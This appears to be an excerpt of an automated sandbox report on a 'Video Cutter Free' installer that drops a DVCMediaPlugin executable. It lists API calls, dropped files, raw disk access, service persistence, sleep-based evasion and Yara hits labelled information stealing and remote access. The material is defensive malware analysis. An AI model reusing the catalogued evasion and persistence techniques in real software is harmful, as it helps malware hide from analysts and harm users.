                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_00459120 push 00459164h; ret 1_2_0045915C
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_0040F398 push ecx; mov dword ptr [esp], edx1_2_0040F39A
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_00443440 push ecx; mov dword ptr [esp], ecx1_2_00443444
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_0040546D push eax; ret 1_2_004054A9
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_0040553D push 00405749h; ret 1_2_00405741
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_004055BE push 00405749h; ret 1_2_00405741
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_00477628 push ecx; mov dword ptr [esp], edx1_2_00477629
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_0040563B push 00405749h; ret 1_2_00405741
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_004056A0 push 00405749h; ret 1_2_00405741
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_004517F8 push 0045182Bh; ret 1_2_00451823
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_004519BC push ecx; mov dword ptr [esp], eax1_2_004519C1
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_0045FB90 push ecx; mov dword ptr [esp], ecx1_2_0045FB94
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_00419C28 push ecx; mov dword ptr [esp], ecx1_2_00419C2D
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_00499D1C pushad ; retf 1_2_00499D2B
                    Source: videocutterfree.exe.1.drStatic PE information: section name: .text entropy: 7.74765022174978
                    Source: DVCMediaPlugin.exe.5.drStatic PE information: section name: .text entropy: 7.74765022174978

                    Persistence and Installation Behavior

                    barindex
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive05_2_00401A4F
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive05_2_0099E652
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpFile created: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpFile created: C:\Users\user\AppData\Local\Video Cutter Free 1.16\is-IBF1C.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpFile created: C:\Users\user\AppData\Local\Video Cutter Free 1.16\is-PTGV1.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpFile created: C:\Users\user\AppData\Local\Video Cutter Free 1.16\LTDIS13n.dll (copy)Jump to dropped file
                    Source: C:\Users\user\Desktop\imMQqf6YWk.exeFile created: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpFile created: C:\Users\user\AppData\Local\Video Cutter Free 1.16\uninstall\is-LRS1N.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpFile created: C:\Users\user\AppData\Local\Video Cutter Free 1.16\msvcp71.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpFile created: C:\Users\user\AppData\Local\Video Cutter Free 1.16\sqlite3.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpFile created: C:\Users\user\AppData\Local\Video Cutter Free 1.16\msvcr71.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpFile created: C:\Users\user\AppData\Local\Video Cutter Free 1.16\is-2IP8E.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpFile created: C:\Users\user\AppData\Local\Video Cutter Free 1.16\uninstall\unins000.exe (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpFile created: C:\Users\user\AppData\Local\Temp\is-F6LGR.tmp\_isetup\_setup64.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpFile created: C:\Users\user\AppData\Local\Video Cutter Free 1.16\is-JSB39.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpFile created: C:\Users\user\AppData\Local\Video Cutter Free 1.16\gdiplus.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpFile created: C:\Users\user\AppData\Local\Video Cutter Free 1.16\is-19B75.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpFile created: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpFile created: C:\Users\user\AppData\Local\Video Cutter Free 1.16\is-J7MTP.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpFile created: C:\Users\user\AppData\Local\Video Cutter Free 1.16\ltkrn13n.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeFile created: C:\ProgramData\DVCMediaPlugin\sqlite3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpFile created: C:\Users\user\AppData\Local\Temp\is-F6LGR.tmp\_isetup\_shfoldr.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpFile created: C:\Users\user\AppData\Local\Video Cutter Free 1.16\is-LDIKA.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpFile created: C:\Users\user\AppData\Local\Temp\is-F6LGR.tmp\_isetup\_iscrypt.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeFile created: C:\ProgramData\DVCMediaPlugin\DVCMediaPlugin.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeFile created: C:\ProgramData\DVCMediaPlugin\sqlite3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeFile created: C:\ProgramData\DVCMediaPlugin\DVCMediaPlugin.exeJump to dropped file

                    Boot Survival

                    barindex
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive05_2_00401A4F
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive05_2_0099E652
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_00402520 StartServiceCtrlDispatcherA,5_2_00402520
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_00423C0C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,1_2_00423C0C
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_00423C0C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,1_2_00423C0C
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_004241DC IsIconic,SetActiveWindow,SetFocus,1_2_004241DC
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_00424194 IsIconic,SetActiveWindow,1_2_00424194
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_00418384 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,1_2_00418384
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_0042285C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,1_2_0042285C
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_00483420 IsIconic,GetWindowLongA,ShowWindow,ShowWindow,1_2_00483420
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_00417598 IsIconic,GetCapture,1_2_00417598
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_00417CCE IsIconic,SetWindowPos,1_2_00417CCE
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_00417CD0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,1_2_00417CD0
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_0041F118 GetVersion,SetErrorMode,LoadLibraryA,SetErrorMode,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,1_2_0041F118
                    Source: C:\Users\user\Desktop\imMQqf6YWk.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,5_2_00401B4B
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,5_2_0099E756
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Video Cutter Free 1.16\is-IBF1C.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Video Cutter Free 1.16\LTDIS13n.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Video Cutter Free 1.16\is-PTGV1.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Video Cutter Free 1.16\uninstall\is-LRS1N.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Video Cutter Free 1.16\msvcp71.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Video Cutter Free 1.16\msvcr71.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Video Cutter Free 1.16\is-2IP8E.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Video Cutter Free 1.16\uninstall\unins000.exe (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-F6LGR.tmp\_isetup\_setup64.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Video Cutter Free 1.16\is-JSB39.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Video Cutter Free 1.16\gdiplus.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Video Cutter Free 1.16\is-19B75.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Video Cutter Free 1.16\is-J7MTP.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Video Cutter Free 1.16\ltkrn13n.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-F6LGR.tmp\_isetup\_shfoldr.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Video Cutter Free 1.16\is-LDIKA.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-F6LGR.tmp\_isetup\_iscrypt.dllJump to dropped file
                    Source: C:\Users\user\Desktop\imMQqf6YWk.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_0-5548
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeAPI coverage: 4.9 %
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe TID: 2748Thread sleep count: 81 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe TID: 2748Thread sleep time: -162000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe TID: 6112Thread sleep time: -60000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe TID: 6112Thread sleep time: -60000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeFile opened: PhysicalDrive0Jump to behavior
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_00452A60 FindFirstFileA,GetLastError,1_2_00452A60
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_00474DFC FindFirstFileA,FindNextFileA,FindClose,1_2_00474DFC
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_004625C4 FindFirstFileA,FindNextFileA,FindClose,1_2_004625C4
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_00463B50 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00463B50
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_00497C14 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,1_2_00497C14
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_00463FCC SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00463FCC
                    Source: C:\Users\user\Desktop\imMQqf6YWk.exeCode function: 0_2_00409B30 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,0_2_00409B30
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeThread delayed: delay time: 60000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeThread delayed: delay time: 60000Jump to behavior
                    Source: videocutterfree.exe, 00000005.00000002.3874287343.0000000000BF2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWI|O_
                    Source: videocutterfree.exe, 00000005.00000002.3874926537.0000000003573000.00000004.00000020.00020000.00000000.sdmp, videocutterfree.exe, 00000005.00000002.3874287343.0000000000B18000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: C:\Users\user\Desktop\imMQqf6YWk.exeAPI call chain: ExitProcess graph end nodegraph_0-6680
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeAPI call chain: ExitProcess graph end nodegraph_5-61739
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_009A82EE IsDebuggerPresent,5_2_009A82EE
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_009AEF6E RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,5_2_009AEF6E
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_004502C0 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_004502C0
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_00995C76 RtlInitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetTickCount,GetVersionExA,_memset,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,_memset,_memset,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_malloc,_malloc,_malloc,QueryPerformanceCounter,Sleep,_malloc,_malloc,_memset,_memset,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,5_2_00995C76
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_009A82D8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_009A82D8
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_00478024 ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,1_2_00478024
                    Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 pause video_cutter_free_12102Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_0042E09C AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid,1_2_0042E09C
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_009A6E1D cpuid 5_2_009A6E1D
                    Source: C:\Users\user\Desktop\imMQqf6YWk.exeCode function: GetLocaleInfoA,0_2_0040520C
                    Source: C:\Users\user\Desktop\imMQqf6YWk.exeCode function: GetLocaleInfoA,0_2_00405258
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: GetLocaleInfoA,1_2_00408568
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: GetLocaleInfoA,1_2_004085B4
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_00458418 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle,1_2_00458418
                    Source: C:\Users\user\Desktop\imMQqf6YWk.exeCode function: 0_2_004026C4 GetSystemTime,0_2_004026C4
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_0045559C GetUserNameA,1_2_0045559C
                    Source: C:\Users\user\Desktop\imMQqf6YWk.exeCode function: 0_2_00405CF4 GetVersionExA,0_2_00405CF4

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.3874746180.0000000002DA1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: videocutterfree.exe PID: 6460, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.3874746180.0000000002DA1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: videocutterfree.exe PID: 6460, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_609660FA sqlite3_finalize,sqlite3_free,sqlite3_value_numeric_type,sqlite3_value_numeric_type,sqlite3_value_text,sqlite3_value_int,memcmp,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_strnicmp,sqlite3_mprintf,sqlite3_mprintf,sqlite3_malloc,sqlite3_free,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_bind_value,5_2_609660FA
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_6090C1D6 sqlite3_clear_bindings,sqlite3_mutex_enter,sqlite3_mutex_leave,5_2_6090C1D6
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_60963143 sqlite3_stricmp,sqlite3_bind_int64,sqlite3_mutex_leave,5_2_60963143
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_6096A2BD sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,5_2_6096A2BD
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_6096923E sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_malloc,sqlite3_malloc,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_realloc,sqlite3_realloc,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_free,5_2_6096923E
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_6096A38C sqlite3_bind_int,sqlite3_column_int,sqlite3_step,sqlite3_reset,5_2_6096A38C
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_6096748C sqlite3_malloc,sqlite3_bind_int,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_reset,sqlite3_bind_int,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_malloc,sqlite3_bind_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_reset,memcmp,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_bind_int64,sqlite3_realloc,sqlite3_column_int,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_bind_int,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,5_2_6096748C
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_609254B1 sqlite3_bind_zeroblob,sqlite3_mutex_leave,5_2_609254B1
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_6094B407 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,5_2_6094B407
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_6090F435 sqlite3_bind_parameter_index,5_2_6090F435
